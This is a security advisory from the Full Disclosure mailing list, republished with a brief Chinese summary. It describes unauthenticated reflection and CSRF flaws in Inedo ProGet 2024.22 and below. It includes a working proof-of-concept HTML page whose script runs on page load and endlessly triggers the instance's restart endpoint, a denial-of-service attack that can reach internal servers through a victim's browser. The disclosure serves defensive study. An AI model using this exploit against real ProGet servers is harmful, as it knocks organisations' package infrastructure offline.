Inedo ProGet Insecure Reflection and CSRF Vulnerabilities
Inedo ProGet 2024.22及以下版本存在未认证拒绝服务和信息泄露漏洞,因C#反射暴露和CSRF保护缺失。攻击者可利用这些漏洞取消执行、重启实例等,并提供示例脚本。 2025-4-27 04:43:6 Author: seclists.org(查看原文) 阅读量:24 收藏
fulldisclosure logo

Full Disclosure mailing list archives

From: Daniel Owens via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 26 Apr 2025 07:12:32 +0000
Inedo ProGet 2024.22 and below are vulnerable to unauthenticated denial of service and information disclosure attacks 
(among other things) because the information system directly exposes the C# reflection used during the request-action 
mapping process and fails to properly protect certain pathways.  These are amplified by cross-site request forgery 
vulnerabilities (CSRF) due to the application's failure to verify the HTTP request method and apply CSRF protections 
accordingly.  Specifically, unauthenticated attackers can chain CSRF and reflection attacks to cancel executions, 
restart the ProGet instance, and perform certain other actions.  The following is a sample script that can be used to 
demonstrate the vulnerability, restarting the victim Inedo ProGet instance ad infinitum.  Notably, this attack will 
work regardless of browser pre-flight protections, etc., since ProGet ignores the HTTP request method.  It is likely 
that more recent versions are also vulnerable to this, but the CSRF portion allows attacking internal (private) 
instances in addition to directly accessible (e.g., public) instances.  This is vulnerability is known to exist across 
multiple major versions.

<!DOCTYPE html>
<html lang="en">
<head>
<script>
function sleep(ms) {
                return new Promise(resolve => setTimeout(resolve, ms));
}
function sendData() {
                var xhr = new XMLHttpRequest();
                xhr.open('HEAD', 
'http://vict.im/0x44/ProGet.WebApplication/Inedo.ProGet.WebApplication.Pages.Errors.UserNotFoundErrorPage/RestartWeb&apos;);
                xhr.send();
}
async function executeDosAttack() {
                while(true) {
                                try {
                                                sendData();
                                                sendData();
                                                // Sleep for 500 ms
                                                await sleep(500);
                                } catch(ignoreMe) {
                                                // Gobble up exceptions since we expect the service to go down and 
pre-flight triggers the shutdown anyway
                                }
                }
}
</script>
</head>
<body onload="executeDosAttack()">
<h1>Insecure Reflection + CSRF + DOS Attack</h1>
<p>It's silently working in the background...</p>
</body>
</html>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

  • Inedo ProGet Insecure Reflection and CSRF Vulnerabilities Daniel Owens via Fulldisclosure (Apr 26)

文章来源: https://seclists.org/fulldisclosure/2025/Apr/30
如有侵权请联系:admin#unsafe.sh